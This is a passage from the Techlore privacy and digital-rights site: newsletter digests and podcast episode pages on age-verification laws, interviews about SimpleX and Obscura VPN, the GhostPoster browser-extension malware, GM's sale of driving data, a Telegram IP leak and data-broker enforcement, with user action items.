building surveillance infrastructure that affects everyone, not just children. Here’s what’s happening,![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-40.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v3.jpg)](https://techlore.tech/age-verification-goes-global-uk-florida-and-the-surveillance-future/) --- ## Action Item ✅ Check where your BitLocker recovery key is stored. Go to Settings > Privacy & Security > Device Encryption (or search "BitLocker" in Settings). If your key is backed up to your Microsoft account, save it locally (write it down, store on USB, use a password manager) and then delete it from Microsoft's servers. Or better yet, research VeraCrypt for full control over your encryption. Because your data shouldn't have a backdoor labeled "For FBI access" ### Age Verification Goes Global: UK, Florida, and the Surveillance Future URL: https://techlore.tech/age-verification-goes-global-uk-florida-and-the-surveillance-future/ Last updated: 2026-01-26T02:18:22.000Z The UK is following Australia's social media ban for kids, but Florida just took it to another level with TWO separate bills targeting app stores AND AI chatbots. These laws would require age verification for nearly every app, building surveillance infrastructure that affects everyone, not just children. Here's what's happening, why the 'protect the children' framing is covering for mass surveillance, and what you can do to push back. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### The Messaging App With No User IDs (SimpleX Interview) URL: https://techlore.tech/the-messaging-app-with-no-user-ids-simplex-interview/ Last updated: 2026-04-07T23:25:03.000Z SimpleX Chat is the only messaging network where users have no identifiers—no phone numbers, no usernames, no user IDs at all. Henry interviewed founder Evgeny Poberezkin about how unidirectional message pipes create a network where servers don't even know users exist, why this isn't federation, how it compares to Signal and Session, and why the company is based in the UK despite encryption battles. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:01:31 SIMPLEX NAME 00:04:20 SIMPLEX TEAM 00:05:10 SIMPLEX VS. MAINSTREAM MESSENGERS 00:08:05 WHY THIS APPROACH? 00:11:14 THE FUTURE OF SIMPLEX 00:14:28 SIMPLEX NETWORK + FEDERATION 00:20:46 REGISTRATION MODELS 00:23:11 GOVERNMENT REQUESTS TO SIGNAL 00:25:42 REGISTRATION MODELS (CONT'D) 00:27:52 MESSENGER DISCUSSION? 00:29:54 SIMPLEX LIMITATIONS 00:31:00 WAYS TO USE SIMPLEX + SCALING 00:37:27 OPEN SOURCE 00:42:21 SIMPLEX ENCRYPTION + DENIABILITY 00:54:00 SIMPLEX METADATA 01:00:53 IP ADDRESS OBSERVATION 01:05:02 USABILITY CHALLENGES 01:09:53 MESSAGE DELIVERY 01:10:58 OUTAGES 01:13:14 MULTI-DEVICE SYNC 01:13:56 DESKTOP ONLY? 01:18:10 BATTERY IMPACT 01:19:44 BACKGROUND SYNC 01:21:50 FUNDING + SUSTAINABILITY 01:30:38 JURISDICTION 01:31:56 LEGAL + LIABILITY 01:40:37 PRIVACY AS A MEANS, NOT AN END 01:41:55 PRIVACY FOR THE MASSES VS. THE FEW 01:45:27 WHAT'S NEXT FOR SIMPLEX? 01:50:57 HOW TO FOLLOW 01:52:09 OUTRO #### Episode Sources • SimpleX: https://simplex.chat • Evgeny's Website: https://www.poberezkin.com/about.html ### Australia's Social Media Experiment Reveals Something Telling | Jan 12-18 URL: https://techlore.tech/australias-social-media-experiment-reveals-something-telling-jan-12-18/ Last updated: 2026-01-21T17:03:18.000Z ## On Our Radar 🎯 [**Australia’s Social Media Experiment: 5 Million Accounts Down, Questions Rising**](https://www.nytimes.com/2026/01/15/world/australia/social-media-ban-australia.html) It’s been one month since Australia implemented the world’s first social media ban for under-16s. The government announced that nearly five million teen accounts have been deactivated or removed from platforms like Instagram, Facebook, Snapchat, and Reddit. The devil’s in the implementation details, and they aren't encouraging. The government released only the total account removal number, no breakdown by platform, no data on how many teens successfully bypassed the restrictions, no clarity on what “removed access” actually means in practice. Meanwhile, Australian teens report widespread workarounds: lying about their age, using parents’ accounts, or simply not being flagged at all. All at the cost of less privacy on the internet for people of all ages, less freedom of information, and the need to handle the data security of these age verification systems. As just one case study: Fifteen-year-old Jack Okill, who built a 1,500-follower audience on Instagram for a political podcast, found himself locked out. His solution? Creating a new account using his mother’s details, with her managing it until he turns 16\. Fourteen-year-old Raeve changed his age on YouTube and kept his Reddit account active without any issues. Despite these obvious shortcomings, governments in Denmark, the EU, France, New Zealand, Malaysia, US, and [now the UK](https://www.engadget.com/social-media/the-uk-is-mulling-an-australia-like-social-media-ban-for-users-under-16-130000446.html) are all still looking at this as an idea that needs to be copied. Perhaps most concerning is what the ban reveals about government priorities. As Raeve noted after being bullied at age 9 for videos he posted and watching a classmate fall into radicalization through social media: he’s disappointed in what he sees as an inadequate effort to actually make platforms safer. The view is that government chose removal over reform, banning kids from the platforms rather than forcing platforms to be safe for everyone. **What you can do:** If you’re in Australia and affected by this ban, the eSafety Commissioner is tracking long-term impacts. Your feedback matters, whether you’re a teen finding workarounds, a parent seeing both benefits and harms, or an advocate concerned about who gets left behind. For those outside Australia, you should be contacting your local representatives and expressing your concerns, as there is still time to make your voice heard! # Bits & Bytes 🤖 **\~** [**840,000 Users Hit by Browser Extensions Hiding Malware in PNG Files**](https://www.bleepingcomputer.com/news/security/malicious-ghostposter-browser-extensions-found-with-840-000-installs/) Seventeen malicious browser extensions collectively downloaded 840,000 times have been discovered hiding malware in their logo images, and some have been active since 2020\. This is part of the same “GhostPoster” campaign exposed by Koi Security in December. Here’s how it works: The extensions hide code in image files that gets extracted and executed after installation. That code fetches heavily obfuscated payloads that track your browsing activity, hijack affiliate links on major e-commerce sites, and inject invisible iframes for ad and click fraud. The most popular infected extension is: “Google Translate in Right Click" — which got over 500k installs alone. The latest variant in “Instagram Downloader” moved malicious staging logic into the background script and uses bundled image files as covert payload containers. At runtime, it scans image bytes for a specific delimiter, extracts hidden data, stores it locally, then Base64-decodes and executes it as JavaScript. So it's only getting more advanced. **Our take:** Five years. Some of these extensions sat in Chrome, Firefox, and Edge stores for five years before detection. All have now been removed from official stores, but if you installed any of them, they’re still active on your browser. Check your installed extensions immediately to check for them! If you see any of the 17 listed extensions (full list in the article), remove them now and consider resetting passwords for accounts you accessed while they were active. Let this be another reminder to keep your extensions as minimal as possible, and only download extensions from trusted developers or organizations. No random extensions from random people! **\~** [**FTC Bans GM From Selling Your Driving Data for 5 Years**](https://www.bleepingcomputer.com/news/security/ftc-bans-general-motors-from-selling-drivers-location-data-for-five-years/) The Federal Trade Commission finalized a settlement with General Motors that bans the automaker from sharing drivers’ location and behavior data with consumer reporting agencies for five years, AND imposes 20-year consent requirements for all connected vehicle data collection. The case stems from GM’s (now-discontinued) “Smart Driver” feature, which the company marketed as a self-assessment tool to help you improve your driving habits. What GM didn’t say: the feature was collecting your precise location and detailed driving behavior every 3 seconds and selling it to consumer reporting agencies, who then sold it to insurance companies. The result? Higher insurance rates or outright coverage denial for millions of drivers who had no idea they were being tracked. **Our take:** This is what “your car is a smartphone on wheels” actually means in practice...constant surveillance feeding a data broker pipeline you never consented to. The FTC called this an “egregious betrayal of consumers’ trust,” and they’re right. If you own a GM vehicle (GMC, Cadillac, Chevrolet, or Buick), check your OnStar settings and opt out of data collection if you haven’t already. For broader vehicle privacy concerns, visit [privacy4cars.com](https://vehicleprivacyreport.com/) to see what data your specific vehicle collects and how to limit it. # This Week on Techlore 📺 In more concerning UK developments, they have activated their new Online Safety Act which requires platforms to *preemptively* scan every message, with some concerning repercussions [UK Mandates Scanning Your Messages Before You Send ThemThe UK has activated new Online Safety Act regulations requiring platforms to preemptively scan every message, image, and post before users can see it. This video explains how client-side scanning works, why encrypted services like Signal and WhatsApp face an impossible choice (break encryption or leave the UK), and the![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-35.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/5.png)](https://techlore.tech/uk-mandates-scanning-your-messages-before-you-send-them/) One of the hottest new VPNs on the scene, Obscura, joined me for a Techlore Talks interview to discuss VPN technology and what issues they're trying to solve. Fun fact: They are partnered with Mullvad as part of their service! [It’s Time for the VPN Industry to Innovate (Obscura Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-36.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260114-OBSCURA-INTERVIEW-thumbnail-v1.jpg)](https://techlore.tech/its-time-for-the-vpn-industry-to-innovate-obscura-interview/) This week's Surveillance Report highlights more Microsoft Copilot security concerns, and other hot news in the digital rights space: [Microsoft Copilot’s Security Failures Are Putting Everyone at RiskTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-37.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report-3.png)](https://techlore.tech/microsoft-copilots-security-failures-are-putting-everyone-at-risk/) And finally, in a new Techlore video style, I made a response video to a WIRED article titled "Dumbphone Owners Have Lost Their Minds" — which I have some strong opinions on: [“Dumbphone Owners Have Lost Their Minds” Response VideoWired published an article saying dumbphone users “lost their minds.” I disagree. In this video, I respond to Wired’s piece arguing that choosing a dumbphone means you’ve lost touch with reality. The author admits smartphone addiction is real, that tech companies intentionally designed “enmeshment,” and that giving up your smartphone![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-38.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v6.png)](https://techlore.tech/dumbphone-owners-have-lost-their-minds-response-video/) # Action Item ✅ **Audit your browser extensions right now.** Open your browser’s extensions page and remove anything you don’t actively use or don’t remember installing. Pay special attention to “utility” extensions like translators, ad blockers, screenshot tools, and downloaders. If you see any of the 17 GhostPoster extensions listed in the linked article, remove them immediately. They’ve been pulled from stores but remain active on your browser until you manually delete them.​​​​​​​​​​​​​​​​ ### "Dumbphone Owners Have Lost Their Minds" Response Video URL: https://techlore.tech/dumbphone-owners-have-lost-their-minds-response-video/ Last updated: 2026-01-21T16:56:14.000Z Wired published an article saying dumbphone users "lost their minds." I disagree. In this video, I respond to Wired's piece arguing that choosing a dumbphone means you've lost touch with reality. The author admits smartphone addiction is real, that tech companies intentionally designed "enmeshment," and that giving up your smartphone feels like losing part of your identity. But instead of seeing this as a problem—they surrender to it. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Microsoft Copilot's Security Failures Are Putting Everyone at Risk URL: https://techlore.tech/microsoft-copilots-security-failures-are-putting-everyone-at-risk/ Last updated: 2026-04-07T23:21:17.000Z This week's Surveillance Report covers Microsoft Copilot's ongoing security failures putting users at risk, the FTC banning GM from selling driver location data, California banning data brokers from reselling health information, Iran's internet shutdown reaching record lengths, the EFF's guide to navigating age gates, and more! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 INTRO 00:46 NEW COPILOT VULNERABILITY 07:35 GM PUT ON TIMEOUT 12:24 DATA BROKER PUT ON TIMEOUT 15:56 OUR SPONSOR: EASYOPTOUTS! 16:54 IRAN INTERNET SHUTDOWN 22:30 EFF AGE GATE GUIDE 26:06 THE DEFENSE BULLETIN #### Episode Sources ****Highlight: Microsoft Copilot's Ongoing Security Failures** - - ****Story 1: FTC Bans General Motors From Selling Driver Location Data** - - ****Story 2: California Bans Data Brokers From Reselling Health Data** - - - ****Story 3: Iran's Internet Shutdown Now One of Its Longest Ever** - ****Story 4: EFF's Guide to Navigating Age Gates** - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ### It's Time for the VPN Industry to Innovate (Obscura Interview) URL: https://techlore.tech/its-time-for-the-vpn-industry-to-innovate-obscura-interview/ Last updated: 2026-04-07T23:24:52.000Z You don't have to trust Obscura—you just have to trust that not both Obscura and Mullvad are compromised. Henry sat down with Carl, former Bitcoin Core developer and founder of Obscura VPN, to discuss how it's the first VPN that mathematically can't log your activity, what makes it censorship-resistant against networks like the Great Firewall, and what it really means to build privacy that's more than "a pinky promise." 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:01:50 CARL'S BACKGROUND 00:10:47 APPLE'S PRIVATE RELAY 00:17:11 TRUSTLESS MODELS 00:19:05 MULTI-PARTY RELAY PARTNERSHIP 00:21:39 TRADITIONAL MULTI-HOP 00:23:39 CENSORSHIP RESISTANCE 00:27:33 MULLVAD VS. OBSCURA TRAFFIC 00:29:35 EXIT IP 00:30:18 BLOCKS, CAPTCHA, & SPLIT TUNNELING 00:31:16 CUSTOM DNS 00:32:41 PARTNERING WITH MULLVAD 00:36:05 OBSCURA VS. PRIVATE RELAY 00:37:10 OBSCURA VS. MULLVAD 00:38:33 OBSCURA VS. DECENTRALIZED VPNS 00:40:57 OBSCURA VS. TOR 00:41:58 REPRODUCIBLE BUILDS 00:50:23 CLIENTS & DEVELOPMENT TIMELINE 00:55:24 SPEED 00:59:06 DEFAULTS VS. CUSTOMIZATION 01:00:48 PRICING 01:02:43 OPEN SOURCE 01:03:34 THE OBSCURA TEAM 01:05:39 THOUGHTS ON THE VPN INDUSTRY 01:07:49 OUTRO #### Episode Sources • Obscura: https://obscura.net • GitHub: https://github.com/Sovereign-Engineering/obscuravpn-client • Trust, 2-Party Relays, and QUIC: https://obscura.net/blog/bootstrapping-trust/ • Mullvad: https://mullvad.net ### UK Mandates Scanning Your Messages Before You Send Them URL: https://techlore.tech/uk-mandates-scanning-your-messages-before-you-send-them/ Last updated: 2026-01-15T02:45:28.000Z The UK has activated new Online Safety Act regulations requiring platforms to preemptively scan every message, image, and post before users can see it. This video explains how client-side scanning works, why encrypted services like Signal and WhatsApp face an impossible choice (break encryption or leave the UK), and the global pattern of "child safety" laws enabling surveillance infrastructure. Plus: the UK's digital ID U-turn proves pushback works—here's what you can do to fight preemptive censorship in your country. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Apple's $1 Billion Gamble: Your Siri, Google's Brain | Jan 5-11 URL: https://techlore.tech/apples-1-billion-gamble-your-siri-googles-brain-jan-5-11/ Last updated: 2026-01-14T07:23:00.000Z ## On Our Radar 🎯 **Apple's Billion-Dollar Gamble: Your Siri, Google's Brain** Apple and Google [announced](https://arstechnica.com/apple/2026/01/apple-says-its-new-ai-powered-siri-will-use-googles-gemini-language-models/) a multi-year partnership that sounds like a privacy nightmare at first glance: Google's Gemini AI will power the next generation of Siri and Apple Intelligence features. Before you panic and throw your iPhone in a lake, here's what's actually happening and why it's more complicated than the headlines suggest. The deal is pretty straightforward: Apple admits it can't compete with Google's AI capabilities, so it's licensing Gemini models as the foundation for Apple's own AI systems. This will roll out later in 2026 with iOS 26, iPadOS 26, and macOS 26 Tahoe. This is part of the 'more personalized Siri' Apple originally promised for iOS 18 in 2024 but delayed—[while continuing to advertise the feature that didn't exist.](https://www.cnbc.com/2025/04/23/apple-ai-ads-went-too-far-watchdog-says.html) Supposedly, Apple will pay Google about $1 billion per year for access to Gemini, and the models will run on [Apple's Private Cloud Compute servers](https://security.apple.com/blog/private-cloud-compute/) to keep user data "walled off from Google's infrastructure." Users are rightfully skeptical. Apple has built its brand on privacy-first features, and now it's partnering with a company whose entire business model revolves around data collection and advertising. However, Apple has implemented genuinely novel [privacy protections](https://www.bleepingcomputer.com/news/apple/apple-confirms-google-gemini-will-power-siri-says-privacy-remains-a-priority/) in Private Cloud Compute that no other major tech company offers. - Our optimistic take: Running Gemini on Apple's infrastructure with Private Cloud Compute protections could deliver better AI without Google's typical data collection practices. - Our pessimistic take: We're being asked to trust that two of the world's largest tech companies will suddenly prioritize user freedom over profit in their billion-dollar partnership. There's also a deeper issue: Apple's walled garden means you can't choose alternatives. There's no technical reason you shouldn't be able to replace Siri with an open-source AI assistant of your choice. **What you can do:** Privacy-focused users should watch for independent security audits of how Apple's Private Cloud Compute actually handles this partnership and any reports of data leakage to Google's infrastructure. We'll cover developments as more information comes to light. --- ## Bits & Bytes 🤖 **\~** [**One-Click IP Leak Hits Telegram Users**](https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-can-reveal-your-ip-address-in-one-click/) Security researchers discovered a serious vulnerability in Telegram's Android and iOS apps that exposes users' real IP addresses through disguised proxy links. Here's how it works: attackers can create malicious proxy links disguised to look like innocent usernames (like @durov) or harmless website URLs. When you click one of these links, Telegram automatically attempts to test the proxy connection *before* adding it to your settings. This test connection bypasses all your configured proxy settings, sending a direct request from your device that logs your real IP address on the attacker's server. **Our take:** Telegram's response is infuriating. They told BleepingComputer that "any website or proxy owner can see the IP address of those who access it" (technically true but completely missing the point) and will add warnings to proxy links rather than fixing the underlying behavior. This is especially dangerous for activists and journalists using Telegram's MTProxy feature to bypass censorship—the very people this feature is supposed to protect. Until Telegram actually fixes this, [use a device-level VPN](https://vpn.techlore.tech) (not Telegram's built-in proxy) and avoid clicking username links or t.me URLs from unknown sources. Add this story to the many that speak to Telegram's realistic privacy offered. **\~** [**California Crushes Data Broker Selling Health Data**](https://www.bleepingcomputer.com/news/legal/california-bans-data-broker-reselling-health-data-of-millions/) California's Privacy Protection Agency just permanently banned a Texas data broker from selling any Californians' personal information. Datamasters bought and resold lists of millions of people with Alzheimer's disease, drug addiction, bladder incontinence, and other medical conditions specifically for targeted advertising. They also trafficked "Senior Lists," "Hispanic Lists," and lists based on political views, grocery purchases, banking activity, and health-related purchases. What makes this case infuriating is that Datamasters initially claimed they didn't do business in California or handle California residents' data, then reversed course when CalPrivacy confronted them with evidence (including a spreadsheet on their own website listing 200,000+ California students). CalPrivacy ordered Datamasters to delete all previously purchased California data by the end of December 2025 and requires them to delete any future California data within 24 hours of receipt. **Our take:** This is what **real** enforcement looks like. If you're in California, [DROP is now live](https://techlore.tech/digital-rights-digest-dec-22-jan-4/). It's the most powerful consumer data deletion tool in the country—use it if you're able! We hope to see more states follow in California's steps and hold one of the most exploitative global industries accountable. **\~** [**Linux Smashes Records on Steam**](https://linux.slashdot.org/story/26/01/12/0411249/linux-hit-a-new-all-time-high-for-steam-market-share-in-december) Here's a quick win: Linux gaming just hit 3.58% market share, up from November's 3.2%. While that might still sound small compared to Windows, this represents a 0.38% jump in a single month and marks both a percentage and absolute user record for Linux on Steam. **Our take:** Two very simple takeaways: First, every percentage point matters for digital rights. More Linux adoption means more users on open-source systems where you actually control your computing. Second, people are tired of Microsoft's Slopware and are desperate to escape. --- ## This Week on Techlore 📺 This week, we released a brand new Techlore Talks interview with Lucas Lasota from the FSFE (Free Software Foundation of Europe) to discuss the DMA and why it's so important for global digital freedom: [Why F-Droid Still Can’t Get on iPhone (Despite New EU Law)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-33.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260107-FSFE-INTERVIEW-thumbnail-henry2.jpg)](https://techlore.tech/why-f-droid-still-cant-get-on-iphone-despite-new-eu-law/) This week's Surveillance Report covered another offline Windows 11 activation method getting killed off my Microsoft and countless other stories from the previous week: [Microsoft Just Removed Another Way to Activate Windows OfflineTechlore Surveillance Report: Weekly News for Your Digital Freedom![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-34.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/_Thumbnail-Surveillance-Report-1.jpg)](https://techlore.tech/microsoft-just-removed-another-way-to-activate-windows-offline/) We're also excited to announce that we've officially resumed [Techlore Clips](https://www.youtube.com/@techloreclips) — where we post shorter segments from our long-form content. Check out our first video from our Fastmail Techlore Talks interview: --- ## Action Items ✅ - Check your Telegram settings. If you want to be safe, switch to a device-level VPN. We have many trusted open source ones on our [VPN chart.](https://vpn.techlore.tech/) - Keep following updates to Gemini/Apple privacy practices. We will keep a close eye. - Enjoy the rest of your weeks; don't forget to get outside, spend time with loved ones, and enjoy your first month of 2026! ### Microsoft Just Removed Another Way to Activate Windows Offline URL: https://techlore.tech/microsoft-just-removed-another-way-to-activate-windows-offline/ Last updated: 2026-04-07T23:20:57.000Z This week's Surveillance Report covers Microsoft removing offline Windows activation, California's new tool to delete your data from brokers, cryptocurrency theft traced to the 2022 LastPass breach, France's social media ban for under-15s, and more! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 Intro to Surveillance Report 00:40 Highlight Story: Microsoft removing more Options 05:48 California's New Data Removal Tool 13:24 LastPass Data Breach Still Impacting People 18:50 Support Techlore! 19:43 More Age Verification in France, US, and more 24:04 The Defense Bulletin #### Episode Sources ****Highlight: Microsoft Removes Offline Windows Activation in Push for Always-Online** - ****Story 1: California Gives Residents Tool to Delete Data From Brokers** - - - - ****Story 2: Cryptocurrency Theft Attacks Traced to 2022 LastPass Breach** - ****Story 3: France Plans Social Media Ban for Under-15s Starting September 2026** - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - ### Why F-Droid Still Can't Get on iPhone (FSFE Lawyer Interview) URL: https://techlore.tech/why-f-droid-still-cant-get-on-iphone-fsfe-lawyer-interview/ Last updated: 2026-04-10T03:08:11.000Z The Digital Markets Act is a can opener for Big Tech's walled gardens, forcing Apple, Google, and Microsoft to open their platforms whether they like it or not. Henry sat down with Lucas Lasota from the FSFE (Free Software Foundation of Europe) to understand what the DMA actually does, why Big Tech is fighting it in court, and what it means for open source software and your digital freedom. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:01:36 WHAT IS THE FSFE? 00:04:12 LUCAS' ROLE AT FSFE 00:05:44 INTRO TO THE DMA 00:09:45 THOUGHTS ON REGULATION 00:12:47 PUBLIC MONEY, PUBLIC CODE 00:21:25 BREAKDOWN OF THE DMA 00:30:54 DMA ENFORCEMENTS 00:31:44 INTEROPERABILITY 00:36:20 DMA ENFORCEMENTS (CONT'D) 00:38:50 DMA CRITICISMS 00:50:41 USB-C ON IPHONES 00:53:03 APPLE'S "MALICIOUS COMPLIANCE" 00:56:57 UNDERSTANDING THE EU 01:02:12 EU COMMISSION & OTHER ORGANIZATIONS 01:06:58 DMA'S GLOBAL INFLUENCE 01:11:57 BIG TECH + INTERPRETATION OF LAW 01:18:23 OUTRO #### Episode Sources • Free Software Foundation Europe (FSFE): https://fsfe.org • Free Software Foundation (FSF US): https://www.fsf.org • Public Money, Public Code campaign: https://publiccode.eu ### Digital Rights Digest | Dec 22-Jan 4 URL: https://techlore.tech/digital-rights-digest-dec-22-jan-4/ Last updated: 2026-01-06T01:10:33.000Z ## On Our Radar 🎯 BIG NEWS: As of January 1, 2026, [California residents can finally use](https://techcrunch.com/2026/01/03/california-residents-can-use-new-tool-to-demand-brokers-delete-their-personal-data/) the **Delete Request and Opt-out Platform (DROP)** to demand that data brokers delete their personal information—all with a single request. Data brokers are that shady industry that collect, buy, and sell your personal information to advertisers, insurance companies, employers, and anyone else willing to pay. They know where you live, what you buy, your health conditions, your political views, your financial situation—and until now, getting them to delete your data meant tracking down [countless companies individually](https://github.com/yaelwrites/Big-Ass-Data-Broker-Opt-Out-List) and submitting separate requests to each one, or using a [premium service to do it for you.](https://easyoptouts.com/) DROP flips this on its head. California residents can now visit , verify their residency, and submit one deletion request that covers all current and future data brokers registered with the state (over 500 of them). Brokers don't start processing requests until August 2026\. If DROP works, it can become a template for other states & international regulators. If you're not in California, contact your state legislators and ask them to implement similar systems—California just proved it's possible. There's no reason why the data broker industry should go unchecked. --- ## Bits & Bytes 🤖 **\~** [**France Joins Global Social Media Age Ban Wave**](https://www.theguardian.com/world/2025/dec/31/france-plans-social-media-ban-for-under-15s-from-september-2026) France's draft bill to ban social media for children under 15 is complete and heading for legal review, with the government aiming for a September 2026 implementation. The bill cites risks including inappropriate content exposure, online bullying, and altered sleep patterns, stating the need to "protect future generations" from threats to their ability to thrive. Several other countries are following suit: Denmark and Norway are planning similar bans for 2026, and Malaysia is planning an under-16 ban. **Our take:** Age verification infrastructure doesn't disappear after checking if someone is 15\. Once platforms build systems to verify ages, that same infrastructure can verify identities, track users across services, and create comprehensive profiles of everyone online. What starts as "protecting children" becomes permanent surveillance architecture for all users. The question isn't whether we should protect kids online, it's whether building global identity verification systems is actually the answer, or just security theater that makes everyone less private. (and oftentimes less secure too!) **\~** [**Meta's Playbook for Avoiding Regulators**](https://www.reuters.com/investigations/meta-created-playbook-fend-off-pressure-crack-down-scammers-documents-show-2025-12-31/) Reuters obtained internal documents revealing Meta's systematic strategy to avoid cracking down on scam ads while appearing to cooperate with regulators. The goal: make scam ads "not findable" for "regulators, investigators and journalists." Meta identified the exact keywords Japanese regulators used to search for scam ads, then deleted those ads that appeared in an attempt to hide the problem from regulators. When advertisers get blocked in one country, Meta's algorithms simply reroute their ads to users in other markets. Taiwan reduced scam ads by 96% after requiring verification, but those same ads just moved elsewhere. Meta estimates universal advertiser verification would cost $2 billion and could lose up to 4.8% of total revenue by blocking unverified advertisers. Despite earning $164.5 billion last year (almost all from advertising), Meta decided that's too expensive. Instead, they've decided to resist verification through lobbying and perception management—accepting it only where legally mandated. **Our take:** This is corporate accountability failure in its purest form. When a company has a literal internal strategy document for how to game regulators into thinking scams are decreasing while actually just hiding them better, that tells you everything about where their priorities lie. This is a cultural pattern at Meta with all of their products. The most depressing stat here to send the message home: Singapore reports that over 90% of social media fraud victims were scammed through Facebook or Instagram. Meta's response? If they pay us, it's cool. **\~** [**ChatGPT to Explore Ads, Potentially Prioritizing Sponsored Content**](https://www.bleepingcomputer.com/news/artificial-intelligence/openais-chatgpt-ads-will-allegedly-prioritize-sponsored-content-in-answers/) Reports suggest the AI could prioritize sponsored content to ensure it appears in ChatGPT answers, meaning companies could pay for ChatGPT to recommend their products when users ask for advice. An OpenAI spokesperson confirmed: "We're exploring what ads in our product could look like. People have a trusted relationship with ChatGPT, and any approach would be designed to respect that trust." **Our take:** The entire value proposition of AI assistants is "helpful neutral advice," and that evaporates the moment answers become sponsored placements. When you can't trust whether ChatGPT is recommending something because it's actually good or because someone paid for the placement, the tool loses its core value. We are not inherently anti-AI, but we *are* anti-enshittification, pro-privacy, pro-transparency, and pro-user. These moves from ChatGPT go against all of our values and we hope they don't inspire other companies to do the same. --- ## This Week on Techlore 📺 It's been a couple weeks since our last newsletter, thank you all for your patience as we navigate the holidays. I am hoping you all had a wonderful time with your loved ones, friends, family, pets, and/or just yourself. We did our best to put out helpful content despite the festive times 🎊 To recap the year, we started a new series, the "Digital Rights Awards," an annual tradition where we give out 10 awards that summarize what happened, and what's to come: [The Year the Internet Changed Forever (2025 Digital Rights Awards)2025 was the year everything we warned about actually started happening, but we also saw massive wins! This is the first year of The Digital Rights Awards, covering the 10 biggest wins, losses, controversies, and lessons that will shape 2026\. Happy new year everyone! Watch on Techlore.TV for 